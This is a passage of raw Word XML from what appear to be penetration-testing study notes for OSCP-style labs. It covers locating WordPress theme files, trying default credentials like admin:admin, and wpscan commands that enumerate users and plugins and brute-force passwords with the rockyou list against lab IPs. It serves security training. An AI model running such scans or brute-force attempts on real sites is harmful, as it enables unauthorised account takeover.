    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CC9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CCA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to find pages within themes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="322"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">General format</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CCC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="322"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://$IP/WP-Root-Install/themes/theme-year-name/nameOfFile.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CCD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="322"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example (theme was</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> twenter-twenty</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the page was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">404.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CCE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="322"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.208.55/themes/twentytwenty/404.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CCF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="322"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You may notice the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WP-Root-Install</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" is not here, since that's because the wordpress root install is just the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.208.55</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. If you found the wordpress site in like the directory /shenzi, then it would look like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CD0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="322"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.208.55/shenzi/themes/twentytwenty/404.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CD1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9qh4bsultrk" w:id="394"/>
      <w:bookmarkEnd w:id="394"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CD2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_y5sipy9l29bw" w:id="395"/>
      <w:bookmarkEnd w:id="395"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using WPScan in general to enumerate and find usernames</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CD3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CD4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: Try default credentials like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin:admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root:root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CD5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CD6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId949">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ColdBoxEasy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(PG Play) (</w:t>
      </w:r>
      <w:hyperlink r:id="rId950">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@abinus2021/coldbox-easy-walkthrough-d6e78e6a455</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CD7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CD8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan --url http://192.168.43.43/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CD9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic scan of the WordPress site</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CDA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CDB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan --url http://192.168.120.50 -t 40 -e u1-1000 --passwords /usr/share/wordlists/rockyou.txt --force</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CDC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1072"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one bruteforces usernames (user ID from 1 to 1000) and the rockyou list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CDD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1072"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-t 40</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : Sets the number of threads to use (40 in this case). Higher threads speed up the scan but may overload the server or trigger detection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CDE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1072"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--force</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : Bypasses any warnings or prompts WPScan might display</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CDF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CE0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CE1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan –url http://192.168.43.43/ --enumerate u</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CE2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="266"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Actively enumerate user accounts ("u" flag stands for users)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CE3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CE4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan –url http://192.168.43.43/ --enumerate u1-20</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CE5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Faster alternative to the one above, but it does have a more limited scope</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CE6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Only tries to enumerate users with IDs from 1 to 20 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CE7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="266"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1955800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="39" name="image32.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image32.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId95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CE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="266"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As seen in this output, we have found 3 users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CE9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CEA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan --url http://192.168.50.244 --enumerate p --plugins-detection aggressive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CEB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1456"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The special part of this is</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--enumerate p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1456"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Which means enumerate all popular plugins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1456"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This scan was seen in the OSCP 27.1.2. WEBSRV1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CEE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CEF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_muatjrcreb7a" w:id="396"/>
      <w:bookmarkEnd w:id="396"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using WPScan to bruteforce usernames and passwords in WordPress</w:t>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rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId952">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ColdBoxEasy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PG Play) (</w:t>
      </w:r>
      <w:hyperlink r:id="rId953">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@abinus2021/coldbox-easy-walkthrough-d6e78e6a455</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CF2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
